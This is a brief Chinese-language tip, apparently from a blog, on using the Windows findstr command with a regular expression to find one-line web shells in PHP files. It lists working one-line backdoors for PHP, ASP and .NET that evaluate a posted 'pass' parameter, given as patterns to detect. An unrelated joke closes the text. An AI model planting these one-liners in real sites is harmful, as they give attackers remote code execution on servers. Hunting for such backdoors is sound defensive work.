在当前目录和子目录下搜索
findstr /R /S "[<][?]php.@eval[(]$_POST.*[)];[?][>]" *.php
/R是使用正则表达式,/S是在当前和子目录中查找,中间有空格
PHP: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> .NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
使用findstr查找本地木马文件
奶奶问孙子:4+1等于几 孙子说:等于6-1。 奶奶说:你明明知道答案,为什么不说? 孙子说:年轻人不讲5的……..